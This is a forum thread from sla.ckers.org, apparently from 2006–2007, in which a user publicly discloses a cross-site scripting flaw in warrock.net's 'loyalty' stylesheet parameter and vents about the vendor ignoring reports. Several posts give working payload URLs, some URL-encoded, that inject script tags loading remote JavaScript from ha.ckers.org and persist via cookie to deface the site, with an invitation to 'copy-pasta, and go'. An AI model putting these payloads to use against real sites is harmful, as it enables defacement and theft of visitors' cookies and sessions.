Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
I hate this...
Posted by: Kyran
Date: September 23, 2006 01:58AM

I told them in July or near it. Months ago!
I told them to keep in touch with me.
I told them it could not be used only for cookie stealing but a myriad of other javascript malware.



www.warrock.net has a user-input based style sheet.
Basically, you can pick what "loyalty" you want the page to look like.
It's stored into a cookie, so the rest of the site looks like it.

Put www. in front, copy-pasta, and go.
warrock.net/?loyalty=nui"/><script src=http://ha.ckers.org/weird/stallowned.js></script><style>

I didn't test it too much, but it seems like the <style> is needed to make it stick in the cookies, thus making the entire site truly defaced by XSS.

To fix it, simply go to http://www.warrock.net/?loyalty=niu


I posted it openly on the forums there. With a link to the SecurityDocs paper on XSS.

- Kyran

Options: ReplyQuote
Re: I hate this...
Posted by: rsnake
Date: September 23, 2006 07:52PM

Until something bad happens most companies don't jump on XSS I've found. Most of the larger companies jump on it simply because it's bad to have anyone lose trust in your site - and that is caused when the media picks up the stories.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: I hate this...
Posted by: Kyran
Date: September 24, 2006 10:06PM

Let's see if the boards handle this URI as well as MSN does.
I've encoded part of the string, but left a few random characters unencoded.
The first and last need to be encoded for things to see it as a safe, real URI it seems.
First, to use a valid style.

http://www.warrock.net/?loyalty=niu
Now to deface.

http://www.warrock.net/?loyalty=%22%3E%3C%73%63%72ipt%20%73%72%63%3D%68tt%70%3A%2F%2F%68%61.%63%6B%65%72%73.org%2Fs.%6As%20%2F%3E

Now go to, http://www.warrock.net to see the stylesheet/cookie action!

- Kyran

Options: ReplyQuote
Re: I hate this...
Posted by: Kyran
Date: January 29, 2007 11:16PM

Oh dear.

It's still open.

http://warrock.net/?loyalty=%22%3E%3Cscript%20src=http://ha.ckers.org/xss.js%3E%3C/script%3E%3Cnoscript%3E

- Kyran

Options: ReplyQuote
Re: I hate this...
Posted by: alf
Date: January 30, 2007 02:12PM

rsnake Wrote:
-------------------------------------------------------
> Until something bad happens most companies don't
> jump on XSS I've found. Most of the larger
> companies jump on it simply because it's bad to
> have anyone lose trust in your site - and that is
> caused when the media picks up the stories.


hah lol i dont believe this. why didnt ebay youtube amazon + yahoo just even _REPLY_ to my mails? :X

do we have to code a xss worm or what do they want to wake up?



Edited 1 time(s). Last edit at 01/30/2007 02:12PM by alf.

Options: ReplyQuote
Re: I hate this...
Posted by: rsnake
Date: February 03, 2007 07:09PM

I can't comment on Amazon or Yahoo, but I have a lot of contacts at eBay if you want me to get you in touch with them.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: I hate this...
Posted by: Ghozt
Date: February 05, 2007 12:46AM

I have a contact at Yahoo that can get it fixed in < 1 day, just PM me and I'll get you in contact with them. I don't know about Amazon, though.

Options: ReplyQuote


Sorry, only registered users may post in this forum.